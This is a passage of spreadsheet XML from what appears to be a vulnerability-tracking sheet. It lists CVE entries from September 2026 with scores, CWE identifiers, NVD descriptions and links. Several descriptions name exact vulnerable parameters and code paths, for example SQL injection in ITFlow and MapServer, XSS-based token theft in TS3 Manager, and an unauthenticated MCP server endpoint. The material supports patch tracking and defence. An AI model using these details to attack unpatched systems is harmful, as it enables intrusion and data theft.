      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-354, CWE-755</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, libmport/util.c did not make every truncated, corrupt, or failed zstd stream fatal in mport_decompress_zstd(), and libmport/fetch.c did not consistently propagate those failures to index-fetch callers. A malicious or faulty mirror could supply compressed package index data that caused ZSTD_decompressStream() or an output write to fail while leaving partial index output available for later use, resulting in package-index integrity loss or denial of service. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54580</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54581</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, the mport_fetch_bootstrap_index() function in libmport/fetch.c could return success when bootstrap index hash verification encountered a missing or invalid hash because the failure path did not preserve a fatal result. A network attacker or compromised mirror able to alter bootstrap index content or its transport path could therefore cause mport to proceed with an unverified or tampered bootstrap package index. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54581</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54583</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-73</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>mport is the MidnightBSD Package Manager. Prior to 2.7.8, libmport/fetch.c did not consistently reject empty, dot, dot-dot, or slash-containing bundle filenames before composing package download and write paths. Malicious package index data could place an unsafe value in indexEntry-&gt;bundlefile, and the missing is_valid_bundle_filename() checks allowed downloaded package data to be written outside the intended cache location or to an unsafe destination name. This issue is fixed in version 2.7.8.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54583</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54597</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>ITFlow provides an IT documentation, ticketing and accounting system for small managed service providers. Prior to version 26.07, an authenticated user with module_support write permission and access to a credential record can perform time-based blind SQL injection through the expires parameter of the share_generate_link handler in agent/ajax.php. sanitizeInput applies string-context escaping, but expires is inserted unquoted into the item_expire_at MySQL INTERVAL expression, allowing a crafted expression and interval unit to execute conditional database queries whose results are inferred from response delays. This can expose password hashes, SMTP credentials, API keys, encrypted vault data, and database metadata and support administrative takeover after credential cracking. This issue is fixed in version 26.07.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54597</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54253</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>TS3 Manager is modern web interface for maintaining Teamspeak3 servers. Prior to 2.2.6, the /api/download handler in packages/server/routes/api.js passes the attacker-controlled port query parameter to socket.connect(port, host) and returns the resulting error.message through res.status(400).send(error.message) as text/html without a Content Security Policy. When a logged-in operator follows a crafted top-level link, the reflected value executes in the manager origin. The token cookie set in packages/ui/src/store/modules/query.js lacks HttpOnly, Secure, and an explicit SameSite attribute, allowing the script to read the token and call the autofillform event in packages/server/socket.js. autofillform returns the decoded JWT, including the cleartext ServerQuery password, enabling operator-session hijacking and control of the managed TeamSpeak server when the operator uses administrative ServerQuery credentials. A valid operator session and user interaction are required. This issue is fixed in 2.2.6.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54253</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54354</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>MapServer is a system for developing web-based GIS applications. Prior to 8.6.4, MapServer's PostGIS runtime filter translation in src/mappostgis.cpp and msPostGISLayerTranslateFilter() treats a filteritem as numeric when CONNECTIONTYPE POSTGIS and metadata such as gml_&lt;item&gt;_type=Integer are configured, but it does not verify that attacker-controlled CGI qstring or OGC API Features featureId input is a numeric literal. The unquoted input is concatenated into the generated PostgreSQL/PostGIS predicate, allowing an unauthenticated remote attacker with access to an affected query endpoint to bypass predicates, enumerate unintended records, perform boolean-based or time-based SQL injection, and increase database load. The issue does not by itself establish database modification capabilities. This issue is fixed in version 8.6.4.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54354</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54451</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>Elixir protobuf is a pure Elixir implementation of Google Protobuf. From 0.8.0 until 0.16.1, services that decode attacker-controlled protobuf bytes with Protobuf.Decoder can be taken offline when the schema contains a self-referential or cyclic message type. In lib/protobuf/decoder.ex, Protobuf.Decoder.value_for_field/3 handles an embedded?: true field by recursively entering the decode / build_message / handle_value / value_for_field call chain without enforcing a nesting-depth limit. Deeply nested embedded fields retain non-tail recursive frames, allowing a comparatively small request to consume substantial CPU and memory, pin a BEAM scheduler, and exhaust the node. This issue is fixed in version 0.16.1.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54451</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56795</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Dell Server Update Utility, versions prior to 26.07.01, contains an Uncontrolled Search Path Element vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56795</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82760</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Inefficient Algorithmic Complexity vulnerability in team-alembic AshAuthentication allows an unauthenticated attacker to exhaust CPU and memory via an oversized base62 segment in a submitted API key.
AshAuthentication.Base.decode62/1 in lib/ash_authentication/base.ex splits its argument into one binary per character and folds it with charval62/2, which recomputes Integer.pow(62, index) at every position instead of accumulating by Horner's method, so cost grows roughly cubically in the input length. bindecode62/1 in the same module is quadratic through Integer.undigits/2 and Integer.digits/2. Neither function caps byte_size/1, and AshAuthentication.Strategy.ApiKey.SignInPreparation passes the underscore-separated segments of the submitted key straight into both, before any key lookup and without prior authentication. The surrounding rescue clauses catch exceptions, not CPU or memory exhaustion.
This issue affects ash_authentication: from 4.8.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82760</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85077</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Sanic is an opensource python web server/framework. Prior to version 24.12.1, and in version 25.12.0, the HTTP/1.1 response pipeline in sanic/response/types.py serializes response header names and values without rejecting carriage-return or line-feed characters. Applications that place attacker-controlled data in response.headers, file(..., filename=...), or cookie path and domain attributes can therefore emit injected headers and may split responses. Depending on application and proxy behavior, this can enable session fixation through injected cookies, cache poisoning, or security-header corruption. This issue is fixed in versions 24.12.1 and 25.12.1.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85077</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86039</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/peer-store</t>
        </is>
      </c>
      <c r="M124" s="5" t="inlineStr">
        <is>
          <t>12.0.24</t>
        </is>
      </c>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 8.0.0 until 12.0.24, @libp2p/peer-store in packages/peer-store/src/index.ts uses consumePeerRecord to verify a RecordEnvelope signature but does not require PeerRecord.peerId in the signed payload to equal the signer peer ID derived by RecordEnvelope.openAndCertify. The expectedPeer option checks only the envelope signer, and the gossipsub Peer Exchange path can provide the attacker's own peer ID as expectedPeer. An attacker can therefore sign a record with the attacker's key, place a victim peer ID and attacker-controlled multiaddrs in the payload, and have certified addresses stored for the victim. The poisoned addresses can cause address-book corruption, dial redirection or failure, routing manipulation, and reachability disruption, although the connection upgrade still verifies remote peer identity and prevents a complete identity takeover. The issue is fixed in version 12.0.24.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86039</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92903</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>412d305a-227d-44f9-a262-a31ba44f2aea</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Snowflake CLI versions prior to 3.27.0 allowed unsanitized user-controlled values to be interpolated into SQL strings that are executed as multi-statement queries. An attacker who is able to supply a malicious project configuration file or craft command-line input can cause Snowflake CLI to execute attacker-controlled SQL statements in the context of the victim's Snowflake session and active role. Successful exploitation requires either write or pull-request access to a project repository whose CI/CD pipeline runs Snowflake CLI under an elevated service account role, or the ability to supply untrusted input to CLI-wrapping automation. Impact is limited by the privileges held by the configured Snowflake role at execution time. The fix is available in Snowflake CLI version 3.27.0, which also addresses several additional security findings. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92903</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26950</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Dell SmartFabric Manager, versions prior to 2.2.1, contains an Insufficient Verification of Data Authenticity vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26950</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54446</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>NetLicensing MCP Server is a natural-language interface that enables agentic applications to manage the software-licensing lifecycle in Labs64 NetLicensing. Prior to 0.1.6, network-reachable HTTP transport requests to /mcp that omit x-netlicensing-api-key, Authorization: Bearer, and the apikey query parameter pass through ApiKeyMiddleware in src/netlicensing_mcp/server.py without authentication. The downstream api_key_ctx in src/netlicensing_mcp/client.py then falls back to the operator's NETLICENSING_API_KEY and authenticates upstream NetLicensing REST API calls under the operator account. An unauthenticated attacker can invoke MCP tools to enumerate products, licenses, licensees, and transactions, create or modify licensing objects, perform validations, and execute destructive delete operations. The issue affects HTTP deployments configured with a server-side key and does not require user interaction. This issue is fixed in version 0.1.6.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54446</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54520</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
